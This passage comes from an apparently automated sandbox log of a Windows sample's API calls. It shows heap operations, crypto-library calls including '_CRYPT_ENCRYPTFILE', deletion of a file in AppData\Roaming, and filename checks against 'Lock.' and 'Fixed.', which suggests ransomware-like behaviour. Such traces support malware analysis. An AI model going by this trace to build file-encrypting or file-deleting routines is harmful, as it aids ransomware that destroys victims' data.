hHeap=0x970000) returned 1 [0231.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0231.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0231.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0231.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0231.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0231.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0231.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0231.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0231.933] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0231.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0231.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0231.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0231.934] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0231.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.936] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0231.936] FreeLibrary (hLibModule=0x756e0000) returned 1 [0231.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0231.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0231.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.936] CloseHandle (hObject=0x2d0) returned 1 [0231.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0231.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0231.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0231.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0231.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0231.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0231.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0231.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0231.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0231.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.939] CloseHandle (hObject=0x2a0) returned 1 [0231.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0231.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0231.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0231.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.945] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.945] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0231.945] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/GxeLAc.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\GxeLAc.mp3", lpFilePart=0x8cedf4*="GxeLAc.mp3") returned 0x2a [0231.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0231.945] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GxeLAc.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\gxelac.mp3")) returned 0x20 [0231.946] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GxeLAc.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10b432e0, ftCreationTime.dwHighDateTime=0x1d5ebc4, ftLastAccessTime.dwLowDateTime=0x176d6600, ftLastAccessTime.dwHighDateTime=0x1d5ef08, ftLastWriteTime.dwLowDateTime=0x176d6600, ftLastWriteTime.dwHighDateTime=0x1d5ef08, nFileSizeHigh=0x0, nFileSizeLow=0x2a33, dwReserved0=0x1, dwReserved1=0x1c, cFileName="GxeLAc.mp3", cAlternateFileName="")) returned 0xa87410 [0231.946] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GxeLAc.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\gxelac.mp3")) returned 1 [0231.990] FindNextFileW (in: hFindFile=0xa87410, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10b432e0, ftCreationTime.dwHighDateTime=0x1d5ebc4, ftLastAccessTime.dwLowDateTime=0x176d6600, ftLastAccessTime.dwHighDateTime=0x1d5ef08, ftLastWriteTime.dwLowDateTime=0x176d6600, ftLastWriteTime.dwHighDateTime=0x1d5ef08, nFileSizeHigh=0x0, nFileSizeLow=0x2a33, dwReserved0=0x1, dwReserved1=0x1c, cFileName="GxeLAc.mp3", cAlternateFileName="")) returned 0 [0231.990] FindClose (in: hFindFile=0xa87410 | out: hFindFile=0xa87410) returned 1 [0231.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0231.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0231.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0231.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0231.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0231.990] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0231.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0231.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0231.990] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0231.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0231.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0231.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0231.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0231.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0231.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0231.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0231.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0231.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0231.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0231.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0231.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0231.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0231.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0231.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0231.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0231.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0231.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0231.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0231.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e564e0 [0231.991] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/GxeLAc.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\GxeLAc.mp3", lpFilePart=0x8cf650*="GxeLAc.mp3") returned 0x2a [0231.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0231.991] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GxeLAc.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\gxelac.mp3")) returned 0xffffffff [0231.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0231.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0231.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0231.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0231.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0231.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0231.992] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.992] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.992] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0231.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0231.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0231.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0231.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0231.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hr9y61oAkM-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r9y61oAkM-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9y61oAkM-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y61oAkM-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="61oAkM-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1oAkM-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oAkM-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AkM-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kM-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.993] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0231.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0231.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0231.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0231.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hr9y61oAkM-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r9y61oAkM-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9y61oAkM-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0231.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y61oAkM-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="61oAkM-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0231.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1oAkM-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0231.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oAkM-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AkM-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0231.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kM-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-K.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.994] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0231.994] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0231.994] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0231.994] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0231.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0231.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0231.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0231.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0231.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0231.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0231.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0231.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0231.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0231.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0231.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0231.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0231.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0231.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0231.997] RtlAllocateHeap (HeapHandle=0x970000, 